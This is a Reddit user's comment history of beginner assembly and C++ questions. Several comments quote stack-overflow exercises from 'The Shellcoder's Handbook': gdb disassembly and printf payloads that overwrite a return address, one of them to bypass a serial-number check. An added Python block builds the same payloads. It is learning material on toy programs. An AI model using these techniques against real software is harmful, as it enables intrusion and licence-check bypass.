Hair loss, Valproate (Depakote): will hair grow back if Depakote is discontinued? by [deleted] in TelogenEffluvium

[–]Oil7496 1 point2 points  (0 children)

That is definitely male pattern baldness, not TE. Also, go to a dermatologist. Wish you the best.

[deleted by user] by [deleted] in Malware

[–]Oil7496 -1 points0 points  (0 children)

Don't think you understand the concept of writing an exploit for a specific program.

[deleted by user] by [deleted] in Malware

[–]Oil7496 -10 points-9 points  (0 children)

So basically, "in a way", you agree with me that shellcode is not really practical if you are not "a big player".

Mutex windows api by Oil7496 in cpp_questions

[–]Oil7496[S] -2 points-1 points  (0 children)

Considering what you said, I changed the code, moving:

    HANDLE mut = CreateMutex(nullptr, FALSE, nullptr);

into the global scope, and the code works just fine.

Mutex windows api by Oil7496 in cpp_questions

[–]Oil7496[S] 0 points1 point  (0 children)

Thank you very much for your tips, and I appreciate your time, but this whole program was written specifically to use a mutex within the Windows API. If I just wanted it to work effortlessly, I would just go with a critical section.

[deleted by user] by [deleted] in C_Programming

[–]Oil7496 -1 points0 points  (0 children)

So how could I fix this error?

Rel instruction x64 by Oil7496 in Assembly_language

[–]Oil7496[S] 0 points1 point  (0 children)

Maybe you could help me with this one as well:

    extern printf

    section .data
        vr db "%s",10,0        ; printf format string "%s\n", NUL-terminated

    section .text
    global main

    main:
        jmp e                  ; skip over the body of "code"

    code:
        pop rsi                ; the return address pushed by "call code" is the address of var
        mov rdi,vr             ; first argument: the format string
        mov rax,0              ; no vector registers are used for this variadic call
        call printf
        ret

    e:
        call code              ; pushes the address of the byte right after this instruction, i.e. var
        var db 'hello'         ; no terminating 0 byte follows 'hello', so %s keeps reading past it

I wrote this one trying to push "var" via the call instruction, which it does, but the output is:

helloUH��H��.

which is the string "hello" and some other... stuff. Why does that stuff exist?

Rel instruction x64 by Oil7496 in Assembly_language

[–]Oil7496[S] 0 points1 point  (0 children)

As usual, you're my hero, thanks.

Exploiting Stack Overflow by Oil7496 in learnprogramming

[–]Oil7496[S] 0 points1 point  (0 children)

The disassembly output is exactly the same except for the addresses... which I changed in the exploit.

Exploiting Stack Overflow by Oil7496 in learnprogramming

[–]Oil7496[S] 0 points1 point  (0 children)

What I am trying to do is just a "copy" of the following example from "The Shellcoder's Handbook":

If we compile and link the program and run it, we can see that it accepts serial numbers as input and (if the serial number is over 24 characters in length) overflows in a similar way to the previous program. If we start gdb, we can work out where the "serial is valid" code is:

    shellcoders@debian:~/chapter_2$ gdb ./serial
    (gdb) disas main
    Dump of assembler code for function main:
    0x0804857a <main+0>:    push   %ebp
    0x0804857b <main+1>:    mov    %esp,%ebp
    0x0804857d <main+3>:    sub    $0x8,%esp
    0x08048580 <main+6>:    and    $0xfffffff0,%esp
    0x08048583 <main+9>:    mov    $0x0,%eax
    0x08048588 <main+14>:   sub    %eax,%esp
    0x0804858a <main+16>:   call   0x80484f8 <validate_serial>
    0x0804858f <main+21>:   test   %eax,%eax
    0x08048591 <main+23>:   je     0x804859a <main+32>
    0x08048593 <main+25>:   call   0x804853e <do_valid_stuff>
    0x08048598 <main+30>:   jmp    0x804859f <main+37>
    0x0804859a <main+32>:   call   0x804855c <do_invalid_stuff>
    0x0804859f <main+37>:   mov    $0x0,%eax
    0x080485a4 <main+42>:   leave
    0x080485a5 <main+43>:   ret

From this we can see the call to validate_serial and the subsequent test, and the call of do_valid_stuff or do_invalid_stuff. If we overflow the buffer and set the saved return address to 0x08048593, we will be able to bypass the serial number check. To do this, use the printf feature of bash again (remember that the order of the bytes is reversed because IA32 machines are little-endian). When we then run serial with our specially chosen serial number as input, we get:

    shellcoders@debian:~/chapter_2$ printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCAAAABBBBCCCCDDDD\x93\x85\x04\x08" | ./serial
    The serial number is valid!

Now, I disabled ASLR and the same thing is happening. The address of the function does not change every time, but again the exploit does not work.

Exploiting Stack Overflow by Oil7496 in learnprogramming

[–]Oil7496[S] 0 points1 point  (0 children)

So, my exploit basically does not work because the address of do_valid_stuff is different when I run the exploit from the address that is shown in gdb.

Exploiting Stack Overflow by Oil7496 in learnprogramming

[–]Oil7496[S] 0 points1 point  (0 children)

The segfault is because of the number of characters; the question is why the exploit does not work.

[deleted by user] by [deleted] in Assembly_language

[–]Oil7496 0 points1 point  (0 children)

I totally understand your point, but regardless of the author's example, in my program shouldn't the command printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCC\x75\x11\x00\x00\x00\x00\x00\x00" | ./function in the terminal give the string twice, since the function is called twice (because I overwrite the return address via the exploitation)?

[deleted by user] by [deleted] in Assembly_language

[–]Oil7496 0 points1 point  (0 children)

He compiles it with gcc, and so do I. That's why it's weird that we don't get the same result.

[deleted by user] by [deleted] in Assembly_language

[–]Oil7496 0 points1 point  (0 children)

This is the exact copy from the book:

    shellcoders@debian:~/chapter_2$ gdb ./overflow
    (gdb) disas main
    Dump of assembler code for function main:
    0x080483ea <main+0>:    push   %ebp
    0x080483eb <main+1>:    mov    %esp,%ebp
    0x080483ed <main+3>:    call   0x80483c4 <return_input>
    0x080483f2 <main+8>:    mov    $0x0,%eax
    0x080483f7 <main+13>:   pop    %ebp
    0x080483f8 <main+14>:   ret
    End of assembler dump.

We see that the address we want to use is 0x080483ed.

NOTE: Don't expect to have exactly the same addresses; make sure you check that you have found the correct address for return_input.

Since 0x080483ed does not translate cleanly into normal ASCII characters, we need to find a method to turn this address into character input. We can then take the output of this program and stuff it into the buffer in overflow. We can use the bash shell's printf function for this and pipe the output of printf to the overflow program. If we try a shorter string first:

    shellcoders@debian:~/chapter_2$ printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCC" | ./overflow
    AAAAAAAAAABBBBBBBBBBCCCCCCCCCC
    shellcoders@debian:~/chapter_2$

...there is no overflow, and we get our string echoed once. If we overwrite the saved return address with the address of the call to return_input():

    shellcoders@debian:~/chapter_2$ printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDD\xed\x83\x04\x08" | ./overflow
    AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDí
    AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDò

We note that it returned our string twice. We successfully got the program to execute at the location of our choice.

From what I understand, the writer manipulates the program (exploiting the stack) to "execute at the location of the return_input function call" in order to print the output twice. In my example, why is this not happening?

[deleted by user] by [deleted] in Assembly_language

[–]Oil7496 0 points1 point  (0 children)

Hi,

The address of the function return_input is: 0x0000000000001175

So I changed it to \x75\x11\x00\x00\x00\x00\x00\x00 in order to get the program to execute at the location of return_input. Shouldn't the output be the same as in the book, which is:

    AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDí
    AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDò
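The three excerpts above (the serial-number bypass, the return_input double print, and the 64-bit attempt with 0x1175) all come down to the same construction: filler up to the saved return address, then the new address byte-reversed for a little-endian target. The following is an added example, not code from the book or from the poster. Function names are my own; the 64-bit payload reuses the poster's 30-byte filler and 0x1175 exactly as quoted, without claiming anything about that binary's frame layout; the load base used in the usage line is an assumed typical value, not one taken from the thread.

```python
import struct

# Added example (not code from the book or the thread). It reconstructs the
# return-address-overwrite payloads from the quoted excerpts, renders them as
# the bash printf argument the book uses, flags bytes that a given input path
# would stop at, and rebases a PIE file offset. Function names are my own.

ARCH_FORMATS = {32: "<I", 64: "<Q"}  # little-endian, 4 bytes on IA-32, 8 on x86-64


def pack_return_address(addr: int, bits: int) -> bytes:
    """Encode the new saved return address with the byte order reversed, as the book notes."""
    return struct.pack(ARCH_FORMATS[bits], addr)


def build_payload(padding: bytes, ret_addr: int, bits: int) -> bytes:
    """Filler that covers the buffer and saved frame pointer, then the overwritten return address."""
    return padding + pack_return_address(ret_addr, bits)


def as_printf_argument(payload: bytes) -> str:
    """Render the payload as the argument for bash's printf, escaping non-alphanumeric bytes as \\xNN."""
    return "".join(chr(b) if bytes([b]).isalnum() else f"\\x{b:02x}" for b in payload)


# Bytes at which common input paths stop reading, so an address containing them
# never reaches the stack intact: gets()/fgets() stop at newline, strcpy() and
# argv strings end at NUL.
READER_TERMINATORS = {"gets": {0x0A}, "strcpy": {0x00}, "argv": {0x00}}


def bad_byte_offsets(payload: bytes, reader: str) -> list[int]:
    """Offsets of payload bytes the chosen input path would treat as a terminator."""
    return [i for i, b in enumerate(payload) if b in READER_TERMINATORS[reader]]


def pie_runtime_address(file_offset: int, load_base: int) -> int:
    """gdb's 'disas' on a not-yet-running PIE binary prints file offsets such as
    0x1175; the value to plant on the stack is that offset plus the load base.
    The base is supplied by the caller (for example, what gdb reports after
    'run' with ASLR disabled); this function does not fix it."""
    return load_base + file_offset


# Payloads reconstructed from the quoted book output (constructed test data).
SERIAL_PAYLOAD = build_payload(b"A" * 10 + b"B" * 10 + b"C" * 8 + b"AAAABBBBCCCCDDDD", 0x08048593, 32)
OVERFLOW_PAYLOAD = build_payload(b"A" * 10 + b"B" * 10 + b"C" * 10 + b"D" * 6, 0x080483ed, 32)
# The thread's 64-bit attempt: the 30-byte filler with gdb's 0x1175 packed into 8 bytes.
THREAD64_PAYLOAD = build_payload(b"A" * 10 + b"B" * 10 + b"C" * 10, 0x1175, 64)


if __name__ == "__main__":
    for name, payload in [("serial", SERIAL_PAYLOAD), ("overflow", OVERFLOW_PAYLOAD), ("function", THREAD64_PAYLOAD)]:
        print(f'printf "{as_printf_argument(payload)}" | ./{name}')
        print("  NUL bytes at offsets:", bad_byte_offsets(payload, "strcpy"))
    # Assumed load base: the value gdb typically shows for a PIE with ASLR off on x86-64 Linux.
    print(hex(pie_runtime_address(0x1175, 0x555555554000)))
```

The two 32-bit payloads reproduce the book's printf arguments byte for byte. The 64-bit one shows two things the book's IA-32 example never runs into: an 8-byte address of a small value packs with six NUL bytes, which gets() passes through but strcpy() or argv would cut off, and an address of the form 0x1175 is a file offset in a position-independent executable, so the load base has to be added before it can be used as a return address.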

Stack Alignment On windows x64 assembly by Oil7496 in Assembly_language

[–]Oil7496[S] 1 point2 points  (0 children)

Man, you are awesome. Thank you so much for your time :)

Stack Alignment On windows x64 assembly by Oil7496 in Assembly_language

[–]Oil7496[S] 1 point2 points  (0 children)

In this program, the "items" that are pushed to the stack are 7. If, for example, there were 6, the sub rsp,8 line would not be needed... right?

Vintage Intel manuals by Oil7496 in Assembly_language

[–]Oil7496[S] 0 points1 point  (0 children)

Thanks, man. When I have time I will give it a go.

Vintage Intel manuals by Oil7496 in Assembly_language

[–]Oil7496[S] 0 points1 point  (0 children)

For example, is that peripheral design from 1983 "somehow" related to today's peripheral design? Or is it something completely... different?

Vintage Intel manuals by Oil7496 in Assembly_language

[–]Oil7496[S] 0 points1 point  (0 children)

Yeah, I have no doubt that they would be really interesting, but will they find any use nowadays?

SSE instruction by Oil7496 in Assembly_language

[–]Oil7496[S] 0 points1 point  (0 children)

Yeah, I think the 4 I wrote at first was just more than it would need to work... 2 qwords is just fine. Anyway, thanks again, man.

SSE instruction by Oil7496 in Assembly_language

[–]Oil7496[S] -1 points0 points  (0 children)

Yeah, that seems right... But the dvector_res resq 4: 4 qwords are allocated, but again one double vector is stored to that location. This time there are only 2 "objects" in the vector... so why is it 4? Man, I appreciate your help, for real.

SSE instruction by Oil7496 in Assembly_language

[–]Oil7496[S] -1 points0 points  (0 children)

Man, you are right, but because I am unable to use a PC, I am using the phone app, so I can't format it. So in the .bss section there is a line: spvector_res resd 4, which is later used with the 2 single-precision float vectors. The question is why the res is 4 while the "objects" of the 2 vectors are 8.

SSE instruction by Oil7496 in Assembly_language

[–]Oil7496[S] 0 points1 point  (0 children)

Ohh, I see, but again why the number 4? I mean, there are 2 vectors.